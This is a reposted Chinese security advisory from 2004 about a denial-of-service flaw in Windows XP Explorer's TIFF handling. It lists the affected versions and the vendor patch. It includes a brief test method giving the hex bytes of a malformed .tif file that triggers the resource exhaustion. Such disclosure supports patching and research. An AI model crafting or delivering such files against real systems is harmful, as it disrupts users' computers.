Microsoft Windows XP explorer.exe TIFF图象处…

2008-04-11 09:36:14来源：互联网阅读 ()

Microsoft Windows XP explorer.exe TIFF图象处理拒绝服务漏洞

发布日期：2004-09-16
更新日期：2004-09-23

受影响系统：

Microsoft Windows XP Professional SP1
Microsoft Windows XP Professional
Microsoft Windows XP Home SP1
Microsoft Windows XP Home

不受影响系统：

Microsoft Windows XP Professional SP2
Microsoft Windows XP Home SP2

描述：

BUGTRAQ ID: 11202

Microsoft Windows是一款基于视窗的操作系统。

Microsoft Windows资源管理器对处理部分TIFF图象存在问题，远程攻击者可以利用这个漏洞对资源管理器进行拒绝服务攻击。

攻击者提交恶意TIFF格式的图象给目标用户，当图象被Microsoft Windows XP系统的资源管理器就会消耗大量系统资源，而产生拒绝服务。

<*来源：Jason Summers （jason1@pobox.com）
*>

测试方法：

警告

以下程序(方法)可能带有攻击性，仅供安全研究与教学之用。使用者风险自负！

Jason Summers （jason1@pobox.com）提供了如下测试方法：

建立如下形式的文件，并赋予'.tif'扩展名：

49 49 2a 00 08 00 00 00 01 00 00 01 03 00 01 00
00 00 01 00 00 00 08 00 00 00

建议：

厂商补丁：

Microsoft
---------
目前厂商已经发布了升级补丁以修复这个安全问题，请到厂商的主页下载：

http://www.microsoft.com/technet/security/

标签：

版权申明：本站文章部分自网络，如有侵权，请联系：west999com@outlook.com
特别注意：本站所有转载文章言论不代表本站观点，本站所提供的摄影照片，插画，设计作品，如需使用，请与原作者联系，版权归原作者所有